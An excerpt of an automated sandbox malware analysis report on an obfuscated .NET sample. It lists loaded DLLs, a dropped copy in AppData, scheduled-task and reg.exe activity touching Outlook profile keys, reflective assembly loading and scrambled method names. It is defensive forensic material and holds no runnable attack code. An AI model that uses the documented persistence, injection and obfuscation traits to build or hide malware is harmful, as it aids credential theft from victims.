Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\reg.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\reg.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\reg.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\reg.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\reg.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\reg.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\reg.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\reg.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\reg.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\reg.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\reg.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\reg.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\reg.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\reg.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\reg.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\reg.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\reg.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\reg.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\reg.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\reg.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\reg.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\reg.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\reg.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\reg.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: jlsvOH1c8bSRKqM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: jlsvOH1c8bSRKqM.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: jlsvOH1c8bSRKqM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: ZxNe.pdb source: jlsvOH1c8bSRKqM.exe, AZJifQrhDpEQCA.exe.0.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DAGiwzvTYsMjq.exe, 00000010.00000000.1786583208.0000000000EFE000.00000002.00000001.01000000.0000000D.sdmp, DAGiwzvTYsMjq.exe, 00000013.00000002.4128994331.0000000000EFE000.00000002.00000001.01000000.0000000D.sdmp, DAGiwzvTYsMjq.exe, 00000017.00000002.4128729232.0000000000EFE000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: jlsvOH1c8bSRKqM.exe, 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000011.00000003.1861195873.0000000003182000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000011.00000003.1863498773.0000000003371000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000014.00000002.1967179845.000000000317E000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000014.00000002.1967179845.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000014.00000003.1962025631.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000014.00000003.1960067886.0000000002C73000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: jlsvOH1c8bSRKqM.exe, jlsvOH1c8bSRKqM.exe, 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, reg.exe, reg.exe, 00000011.00000003.1861195873.0000000003182000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000011.00000003.1863498773.0000000003371000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000014.00000002.1967179845.000000000317E000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000014.00000002.1967179845.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000014.00000003.1962025631.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000014.00000003.1960067886.0000000002C73000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: reg.pdb source: jlsvOH1c8bSRKqM.exe, 00000008.00000002.1861652311.0000000001248000.00000004.00000020.00020000.00000000.sdmp, AZJifQrhDpEQCA.exe, 0000000F.00000002.1960190592.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000010.00000003.1799312024.0000000000FDB000.00000004.00000001.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000010.00000002.4128948551.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000013.00000003.1898624994.0000000000B5B000.00000004.00000001.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000013.00000002.4128613079.0000000000B68000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: reg.pdbGCTL source: jlsvOH1c8bSRKqM.exe, 00000008.00000002.1861652311.0000000001248000.00000004.00000020.00020000.00000000.sdmp, AZJifQrhDpEQCA.exe, 0000000F.00000002.1960190592.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000010.00000003.1799312024.0000000000FDB000.00000004.00000001.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000010.00000002.4128948551.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000013.00000003.1898624994.0000000000B5B000.00000004.00000001.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000013.00000002.4128613079.0000000000B68000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ZxNe.pdbSHA256+ source: jlsvOH1c8bSRKqM.exe, AZJifQrhDpEQCA.exe.0.dr

            Data Obfuscation

            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, ekiVxK6VuR4OQnevN0.cs | .Net Code: M1NmnIjfqZZ3BCdHPsm System.Reflection.Assembly.Load(byte[])
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, ekiVxK6VuR4OQnevN0.cs | .Net Code: M1NmnIjfqZZ3BCdHPsm System.Reflection.Assembly.Load(byte[])
            Source: 0.2.jlsvOH1c8bSRKqM.exe.26d7d44.1.raw.unpack, PingPong.cs | .Net Code: _202A_200E_202C_200B_206A_202D_202E_206A_206B_206C_202B_206C_202C_202A_200E_200E_202E_200C_206B_200F_200D_200F_206F_200F_206D_200E_206C_202B_202C_200B_202C_200B_200C_206D_200D_200F_202E_200F_206E_200D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, ekiVxK6VuR4OQnevN0.cs | .Net Code: M1NmnIjfqZZ3BCdHPsm System.Reflection.Assembly.Load(byte[])
            Source: 0.2.jlsvOH1c8bSRKqM.exe.50d0000.4.raw.unpack, PingPong.cs | .Net Code: _202A_200E_202C_200B_206A_202D_202E_206A_206B_206C_202B_206C_202C_202A_200E_200E_202E_200C_206B_200F_200D_200F_206F_200F_206D_200E_206C_202B_202C_200B_202C_200B_200C_206D_200D_200F_202E_200F_206E_200D_202E System.Reflection.Assembly.Load(byte[])
            Source: 9.2.AZJifQrhDpEQCA.exe.2814e14.4.raw.unpack, PingPong.cs | .Net Code: _202A_200E_202C_200B_206A_202D_202E_206A_206B_206C_202B_206C_202C_202A_200E_200E_202E_200C_206B_200F_200D_200F_206F_200F_206D_200E_206C_202B_202C_200B_202C_200B_200C_206D_200D_200F_202E_200F_206E_200D_202E System.Reflection.Assembly.Load(byte[])
            Source: jlsvOH1c8bSRKqM.exe | Static PE information: 0xB0A7146F [Sat Dec 1 13:02:39 2063 UTC]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 0_2_070641FD push FFFFFF8Bh; iretd 0_2_070641FF
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_004238C3 push esi; ret 8_2_004238CE
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_0040512F push esi; iretd 8_2_00405130
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_0040AA5C push edi; iretd 8_2_0040AA5D
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_00414237 push ss; iretd 8_2_00414248
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_00411AC0 push ebp; ret 8_2_00411AC1
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_00417C4E push ss; iretd 8_2_00417C63
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_00417C53 push ss; iretd 8_2_00417C63
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_004084CE push ds; iretd 8_2_004084E1
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_00414483 push edx; iretd 8_2_00414484
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_00405483 push FFFFFFBBh; retf 8_2_00405485
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_00403570 push eax; ret 8_2_00403572
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_00408632 push 82FF1BCBh; retf 8_2_0040863E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_004086C5 push ebp; ret 8_2_004086C6
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_0040CF71 push ebx; ret 8_2_0040CF72
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_00404FFF push ds; iretd 8_2_0040500A
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_0177225F pushad ; ret 8_2_017727F9
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017727FA pushad ; ret 8_2_017727F9
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017A09AD push ecx; mov dword ptr [esp], ecx 8_2_017A09B6
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_0177283D push eax; iretd 8_2_01772858
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe | Code function: 9_2_070F36ED push FFFFFF8Bh; iretd 9_2_070F36EF
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe | Code function: 15_2_0116C06D push edi; ret 15_2_0116C06F
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe | Code function: 15_2_010F1368 push eax; iretd 15_2_010F1369
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe | Code function: 15_2_0116C54F push 8B010F67h; ret 15_2_0116C554
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe | Code function: 15_2_0116C54D pushfd ; ret 15_2_0116C54E
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe | Code function: 15_2_011209AD push ecx; mov dword ptr [esp], ecx 15_2_011209B6
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe | Code function: 15_2_0116C9D7 push edi; ret 15_2_0116C9D9
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe | Code function: 15_2_0116BF38 push edi; ret 15_2_0116BF3A
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe | Code function: 15_2_010F1FEC push eax; iretd 15_2_010F1FED
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe | Code function: 15_2_01170E7F push edi; ret 15_2_01170E81
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe | Code function: 15_2_0116BEAD push edi; ret 15_2_0116BEAF
            Source: jlsvOH1c8bSRKqM.exe | Static PE information: section name: .text entropy: 7.9159393452530775
            Source: AZJifQrhDpEQCA.exe.0.dr | Static PE information: section name: .text entropy: 7.9159393452530775
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, picCfyhycqVC04P7lL.cs | High entropy of concatenated method names: 'ETVoNmy0E', 'YE2eacpgD', 'jSc75uJhr', 'LR4OUAKTW', 'ffc9u8HJl', 'jU6kgfxHp', 'JtKD8l6g7Ws4uldIaC', 'U9hcAhNp9IQNE8IAW6', 'Gk8NPtTtN', 'pTGFtHlYc'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, b19wuHZr1gri9Sh9ho.cs | High entropy of concatenated method names: 'pMemcD7mJ4', 'LsymHWQDfc', 'pYUNwQhhth', 'PmXNs9NHdy', 'iHdmEMLWGg', 'JlAmv3ZrGZ', 'zLIm0EUurf', 'iVemAcqJLH', 'DEkmIvc4Co', 'BhomfUnk2a'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, XTijwf2U1USfxTU6oq.cs | High entropy of concatenated method names: 'edJNPwZ0p2', 'hqxNpmHQ0j', 'WsdNjbO5Ip', 'w6dNJwvgQa', 'OWKNATmfdq', 'CITNaJeFgb', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, gjgmXoAXn4tWbfndxk.cs | High entropy of concatenated method names: 'sEGigaUykT', 'eOLivNltwa', 'op8iAkJDuw', 'qC1iIAg347', 'OtgipFkaBJ', 'oLLijURYrU', 'HrciJ2HKJ7', 'I6ViaB3nYO', 'qBRi4CS5ED', 'u5PiTKRZuc'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, webBCGxs4cEidVqfoA.cs | High entropy of concatenated method names: 'M5DuAgNgB7', 'uhvuIAmwrT', 'BDQufFxBGJ', 'Ha3uKg2eFf', 'HxTuW3lbUT', 'YAXuZsAqp2', 'oGBudNIyTX', 'S5cucniZ2y', 'h8Du2nJWj2', 'Hi1uHcMcOA'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, pfKX9pTyV9AHnv1emj.cs | High entropy of concatenated method names: 'OWdCtNiuv5', 'SOqCYwBnKO', 'd8xCyXLbOU', 'JNgyHGuydu', 'W09yzdVkZe', 'kO8CwsIiEm', 'cZfCs0UOLa', 'JScChP330W', 'WHaCLZkWTt', 'ASeCXUbgWp'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, JZ2ny8fI1YmI7oWLrL.cs | High entropy of concatenated method names: 'ToString', 'y98DEl2lK1', 'tVQDpWCvKX', 'w8mDjMRDdQ', 'HKWDJWA09y', 'zSZDawp5ur', 'P4FD44sDHD', 'bXsDTsecTf', 'IusD3aKGkA', 'AecDrOVogl'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, IhRO8Tsw4lT9Fs7fuvm.cs | High entropy of concatenated method names: 'YOqn1fPqlW', 'IKUn8t9GfF', 'PinnohFcQY', 'E2AnejYVeD', 'mfZnlNYlMN', 'kC6n7ftKOh', 'uWhnOpU214', 'K5nnxKbrIH', 'aXnn9KYxVu', 'NO5nkIi5is'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, VkxmdCPh0dF91gyE8L.cs | High entropy of concatenated method names: 'mOEySM2xGm', 'TPAyuVgrBj', 'ABLyqEGCDa', 'kyOyCceOMu', 'qjky64rEgL', 'SpVqWd58EI', 'NGHqZRyulM', 'V23qdvYQuj', 'f4cqcFv4cA', 'VpQq2vvhb9'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, m7ehKDuvw5GaO3SAiB.cs | High entropy of concatenated method names: 'Dispose', 'aVcs2wccPR', 'D4qhp6FJrl', 'U67ffATqBq', 'QgRsHUbpUT', 'OCcsz64q02', 'ProcessDialogKey', 'UF2hwTijwf', 'u1UhsSfxTU', 'koqhhZF30a'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, L2K7nbzRb5MnTUOUu0.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SBLn5685OY', 'hPInibMbeK', 'jm2nDmclI1', 'NnunmLIZBE', 'W4anNXwWef', 'vNrnnAPvbH', 'IpnnFa23xN'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, ORUbpUcTECc64q02WF.cs | High entropy of concatenated method names: 'WqbNtu2PR9', 'bhqNuZMXqS', 'sesNYXO3cK', 'Fs8NqhZrPN', 'wd0NyjIJ3t', 'YVwNCeptVR', 'j4lN6S7dFj', 'P7rNBVduGP', 'AhxNbZh6nd', 'bV4NRJBMPA'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, Vfq87d0qyfa9UN0Y3r.cs | High entropy of concatenated method names: 's5f5xKkSPd', 'br559CEXyk', 'z3U5PFPKOe', 'u1D5pIB2jr', 'auw5JPKkIo', 'wSs5aVRLYq', 'xtO5Tj2Bj9', 'UPY53iY3vA', 'i8O5gdNeNO', 'cbi5EfJibe'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, R43ntJ9WlnGQu3XYW2.cs | High entropy of concatenated method names: 'MZVYeFbD63', 'rlWY7htTrA', 'ToJYxIMhc6', 'HX7Y9Exf17', 'ILqYieMTAf', 'H9oYDjTvY3', 'jthYmxTLuc', 'FWQYNSQ1J2', 'BbqYnqr4B1', 'x6qYFRhW47'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, ekiVxK6VuR4OQnevN0.cs | High entropy of concatenated method names: 'lx3LSQA9nb', 'kwQLtL1AZo', 'QBTLued96p', 'pbkLYoWOYn', 'GkSLqQpdGZ', 'MRsLyTZ6eF', 'cidLCkdyvt', 'KB1L6oy3mk', 'DykLB2RKK4', 'XiiLb0RwMO'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, COQHp4sLPuyvhXixHFc.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HvRFAvvRZN', 'd1uFI4KCEt', 'eM4Ffyhxvp', 'JnXFK2OUhw', 'uReFWBLJY0', 'yxJFZgrDqx', 'Lg7FdTFrdl'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, govCQSXA7pTF7U4miR.cs | High entropy of concatenated method names: 'kwQsCebBCG', 'b4cs6EidVq', 'IWlsbnGQu3', 'eYWsR2VUUk', 'kGqsiFZZkx', 'qdCsDh0dF9', 'X90vSAigQXuf48LRBn', 'bZxhrsDmkJgdnoaLOZ', 'IVwssZ4MdQ', 'sWksLWr7Xw'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, CNHbGRJjsbShBn9kCk.cs | High entropy of concatenated method names: 'qpsyVDsAcd', 'DQTy1wB96J', 'CZEyolmiVm', 'kCSye3SCHc', 'U3ty7wd5X0', 'CGPyOSkK8N', 'NAny9L5em2', 'zS8yk25419', 'NXOgAmurcV1XGxbqmhs', 'bRIjQvuL6oovgJppWVJ'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, XjaMkDreeAEx2QyBUh.cs | High entropy of concatenated method names: 'nhlC1u79iv', 'qIWC8JQmnG', 'nYFCo6bWNC', 'M2XCe52vyx', 'BfmClIJltB', 'JeiC73xqFF', 'oVyCOMP5Gw', 'F8aCxHCQYG', 'yncC9WAIoH', 'PBcCkVrYSm'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, FNDhjfKOXWnfEgrOxW.cs | High entropy of concatenated method names: 'uDHmbNb44c', 'vMOmRjl1jW', 'ToString', 'MFYmtcF7Ip', 'IgPmuYEV60', 'GLAmYcdF13', 'NMjmqKu43A', 'fEtmy2XSLN', 'JNDmCf4mm7', 'Y2bm6uJyW4'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, VF30aAHoJ8tYtu7HW4.cs | High entropy of concatenated method names: 'goGnsJISGS', 'dkXnLdrne1', 'zx3nXCoAag', 'qifntkA5KF', 'nqtnueJQdh', 'PRYnq6Dvlf', 'iplnyMgocv', 'jEbNdcFQFI', 'HvYNcrgEh4', 'q52N2i9CrN'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, picCfyhycqVC04P7lL.cs | High entropy of concatenated method names: 'ETVoNmy0E', 'YE2eacpgD', 'jSc75uJhr', 'LR4OUAKTW', 'ffc9u8HJl', 'jU6kgfxHp', 'JtKD8l6g7Ws4uldIaC', 'U9hcAhNp9IQNE8IAW6', 'Gk8NPtTtN', 'pTGFtHlYc'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, b19wuHZr1gri9Sh9ho.cs | High entropy of concatenated method names: 'pMemcD7mJ4', 'LsymHWQDfc', 'pYUNwQhhth', 'PmXNs9NHdy', 'iHdmEMLWGg', 'JlAmv3ZrGZ', 'zLIm0EUurf', 'iVemAcqJLH', 'DEkmIvc4Co', 'BhomfUnk2a'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, XTijwf2U1USfxTU6oq.cs | High entropy of concatenated method names: 'edJNPwZ0p2', 'hqxNpmHQ0j', 'WsdNjbO5Ip', 'w6dNJwvgQa', 'OWKNATmfdq', 'CITNaJeFgb', 'Next', 'Next', 'Next', 'NextBytes'
